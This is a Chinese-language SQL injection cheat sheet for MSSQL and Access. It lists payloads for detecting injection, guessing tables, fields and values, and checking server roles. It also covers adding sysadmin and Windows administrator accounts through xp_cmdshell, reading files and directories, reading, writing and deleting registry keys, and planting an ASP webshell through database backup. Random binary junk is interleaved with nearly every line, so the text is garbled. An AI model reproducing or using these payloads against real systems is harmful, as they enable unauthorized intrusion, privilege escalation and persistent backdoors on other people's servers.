1.判断是否有注入;and 1=1 ;and 1=2 l#P)9��$%�
2.初步判断是否是mssql ;and user>0 /�]=d�Pb%�
�t7�|uZHKK
3.注入参数是字符'and [查询条件] and ''=' o�dxsF(Q0p
�e|:#�Y��^
4.搜索时没过滤参数的'and [查询条件] and '%25'=' N>z<v\��`�
b�2;+a��(�
5.判断数据库系统 k/+�-T�q;�
��Z5�aU��7
;and (select count(*) from sysobjects)>0 mssql �A^+G
w�\
(1�7%/80-J
;and (select count(*) from msysobjects)>0 access /� ��d
S!�
G�{*m] �0Q
bH�}�6N>Fp
MS{�pu�r�D
6.猜数据库 ;and (select Count(*) from [数据库名])>0 FC.d]XA%/d
` aTkIo:ms
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 oY@�4G)5��
9z9z�:P�U
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 rM6^�p�zxe
�Lq@pJ�)�a
9.(1)猜字段的ascii值(access) �p8<Y5��:`
$x&@!/&|pv
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �$YvT*
T$_
�8zew8I~s
(2)猜字段的ascii值(mssql) G%N/]�]l�l
�%AbA(F���
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 J{�$��+�\�
T�:+%3+;a�
10.测试权限结构(mssql) F�"O{eK�0T
'LZF^m _<<
b�#���h?O}
@vWC�� "W�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Ui6�f>0�?�
fu�|N{$h%X
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- `+�17��x<N
[K�Xx�n>n
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ]_NN�,m>�z
"��oZ]�/(
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �Hl"�rGA�>
��55xv+|k�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 4�`@]��jm
|ubDud�z�p
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- `{fqnN�JE�
��V6l*�!R�
;and 1=(select IS_MEMBER('db_owner'));-- Ojj:�YLlY>
4H�lOv�%�8
=G9�%Hz5~:
bX�#IE[Yp}
11.添加mssql和系统的帐户 O��/\�L0\T
TQm� x���$
;exec master.dbo.sp_addlogin username;-- R�
}M�'D15
;exec master.dbo.sp_password null,username,password;-- �=jv�M�$��
Y�(�IT#x?p
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Vm.&�J��Vb
UF)rB�Av(/
;exec master.dbo.xp_cmdshell 'net user username password f��r�S�1<+
<VV./W8e9
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- xq�_%|p}y�
0T�2h3��,
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �-o\$�.Q3�
%����zE_�Q
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- G)�\s{��qk
�c�;_GZ}8�
?(G��M�e>�
W�T�Pp/Nq'
12.(1)遍历目录 U�JG�)-��x
Pxu!,Mi�[d
;create table dirs(paths varchar(100), id int) xZjl_�b��J
7|3Qcn7P)@
;insert dirs exec master.dbo.xp_dirtree 'c:\' wsp&�U�
.z
<N"t[N�70;
;and (select top 1 paths from dirs)>0 p
D!IB`cA4
{<~�0nLyJS
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) }J .f
5WaG
�o�Xwoi�!�
KN�U/K�c�#
vT�N/�ho,H
(2)遍历目录 $�|.x�!sA�
7"F�
w8�;k
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- .{D�[!Dp#h
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 AfKJa�DK�f
~[XDK`B���
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 2<��}^�m/}
jI@0j�x�F�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 -e�#YW�Mo(
r,=xI`�XH�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 e#Jx|�E�j=
#.p^�S0\pw
*�leQd^4�7
3/�8o�)9f.
13.mssql中的存储过程 �^
ab�%Mbb
u`Djle��
xp_regenumvalues 注册表根键, 子键 u�2K{3+r`'
";B.^pBv@;
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 6N(Wv0b� $
{snLi�C�l�
xp_regread 根键,子键,键值名 q@;W�XH�O0
��f XxdOn.
;exec xp_regread s�KIWr{�D�
j�>~^j��z:
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �uy\���<�t
��T/G1v;]�
xp_regwrite 根键,子键, 值名, 值类型, 值 �P\�;l�H"9
B&A�4-w v
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �[�dF�xW6n
8'J>�@� uW
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Wq
7
c/��|
�&
Sy0O�f�
xp_regdeletevalue 根键,子键,值名 �rb%P30qc4
3:jKu��O�X
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 A<^IG+Q,B7
/�3:R{9S�%
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 x<60=f[O2R
�eKn&`\�j6
%)*!(%\S*3
�b_-ESs]�g
14.mssql的backup创建webshell +<6L>ZAL��
# 'G/�&&�<
use model ug�[|'t�R8
�pI7�\]�e�
create table cmd(str image); �N kp>yVj
@PuJre4!;L
insert into cmd(str) values (''); gT-'�#K2qT
��bs
U$mtW
backup database model to disk='c:\l.asp'; T8>:@EL-k�
!>��b>"\�b
�/Ik_�U?$*
�4XK*sR0-`
15.mssql内置函数 Cl[ '6L��k
��o!L1�Qrh
;and (select @@version)>0 获得Windows的版本号 iZ�#dS}VlJ
��Zoj.�F��
;and user_name()='dbo' 判断当前系统的连接用户是不是sa :gDI�GBK,�
o�wZj�Q��
;and (select user_name())>0 爆当前系统的连接用户 *�#e%3N05_
vn��3<�LQ]
;and (select db_name())>0 得到当前连接的数据库 :k8>)x]
�)
�*�MW)APw=
U�Buk-��tq
&0SGAJle�c
16.简洁的webshell UTK�S<.��q
0z/tceW'F
use model is�?`tre\P
85Q2c�����
create table cmd(str image); rxC�E��O�G
�j�V8mn{�<
insert into cmd(str) values (''); +`9
]L]J]4
JV�(eHu�w
backup database model to disk='g:\wwwtest\l.asp';
